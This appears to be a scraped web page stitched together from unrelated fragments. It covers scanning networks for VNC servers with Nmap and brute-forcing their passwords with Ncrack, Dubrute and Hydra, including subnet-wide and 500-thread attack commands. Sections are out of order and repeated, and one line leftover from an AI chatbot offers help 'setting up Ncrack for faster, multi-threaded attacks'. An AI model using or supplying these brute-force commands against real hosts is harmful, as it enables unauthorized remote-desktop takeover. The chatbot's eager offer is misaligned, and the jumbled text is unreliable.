Dubrute Vnc Scanner | Nmapzip Work
Use Nmap to discover VNC servers on your network. The default port is 5900. Simple Scan: nmap -p 5900,5901,5902 -sV 192.168.1.0/24
Find Open VNC Servers: nmap -p 5900-5910 --open -oG vnc_open.txt 192.168.1.0/24
Check for No-Authentication VNC: Use the Nmap Scripting Engine (NSE) to find VNC servers that don't require a password.nmap -p 5900 --script vnc-none-auth 192.168.1.0/24 2. Brute Force VNC with Ncrack
Once you have a list of targets (e.g., from vnc_open.txt), use Ncrack to brute-force the credentials.
Example Command:ncrack -vv --user admin -P /path/to/passwords.txt vnc://192.168.1.2:5900 dubrute vnc scanner nmapzip work
Targeting Subnets:ncrack -vv --user-file users.txt -P passwords.txt vnc://192.168.1.0/24 Key Ncrack Arguments: -vv: Verbose output (shows attempted passwords). --user admin: Set a specific username. -P: Path to password list. vnc://: Specify the protocol. 3. Nmap .zip Binary Usage (Windows)
If using the Nmap portable .zip version on Windows, follow these steps:
Download & Extract: Download the latest .zip binaries from the Nmap download page. Extract it to a folder (e.g., C:\Nmap).
Install Npcap: The zip includes an npcap-oem.exe. It must be installed for packet sniffing to work. Use Nmap to discover VNC servers on your network
Run from Command Line: Open cmd.exe, navigate to the folder (cd C:\Nmap), and run the scan:nmap.exe -p 5900 192.168.1.1 Recommended Resources & Blog Posts
For a detailed guide on using Ncrack, the Ncrack Man Page is the official reference. A highly helpful walkthrough of this specific workflow is available on Medium: Exploiting VNC Port 5900. If you want, I can help you with: Creating a custom wordlist for VNC passwords. Setting up Ncrack for faster, multi-threaded attacks.
Interpreting VNC scan results to distinguish between different types of VNC security. Let me know which of these you'd like to explore next. Windows | Nmap Network Scanning
Part 2: Compressing & Packaging Nmap Output (NmapZip alternative)
While nmapzip isn’t a standard tool, you can easily create compressed archives of scan results: Part 2: Compressing & Packaging Nmap Output (NmapZip
1. Introduction to Tools
- VNC (Virtual Network Computing): A graphical desktop-sharing system that allows users to remotely control another computer.
- Brute-force VNC Scanner: A tool used to guess VNC passwords by trying a large number of combinations. This is often used maliciously but can also be used for legitimate security testing.
- Nmap (Network Mapper): A free and open-source network scanner used for network exploration, security auditing, and monitoring.
- Zip Files: A type of compressed file format that can contain one or more files.
Step 4: Executing Dubrute (The Brute Force)
Now Dubrute takes over. A typical Dubrute command against VNC looks like this:
dubrute -t vnc_attack_package.zip -p vnc -w passwords.txt -T 500
-t: Target list (the ZIP file).-p: Protocol (vnc).-w: Wordlist (passwords).-T: Threads (500 concurrent attempts).
Dubrute will read each IP from the ZIP, attempt to connect via the VNC protocol, and try every password from the wordlist. When a match is found, it logs the working credentials to Good.txt or Cracked.txt.
3. Nmap
Nmap (Network Mapper) is a powerful open-source tool for network discovery and security auditing. It can scan IP networks to determine what hosts are available, what services they are offering, and what operating systems they are running.
-
Use Cases:
- Network Inventory: Keep track of all devices on your network and their services.
- Security Scanning: Identify potential vulnerabilities by detecting and classifying service versions.
-
How to Use:
- Basic Scanning:
nmap -sS target_IP - Service Version Detection:
nmap -sV target_IP
- Basic Scanning:
7) Zip and archive results
- Organize: mkdir -p archive/$(date +%F) mv scans hydra_results_*.txt screenshots archive/$(date +%F)/
- Create password-protected zip: zip -P "StrongPassword123" -r archive_$(date +%F).zip archive/$(date +%F)
3) Prepare wordlists / credentials
- Use common password lists (rockyou, simple lists). Example: sudo apt install wordlists gunzip /usr/share/wordlists/rockyou.txt.gz
- Create username list (often empty or single user). For VNC, many servers accept any username; hydra needs a username file: printf "root\nadmin\nuser\n" > creds/usernames.txt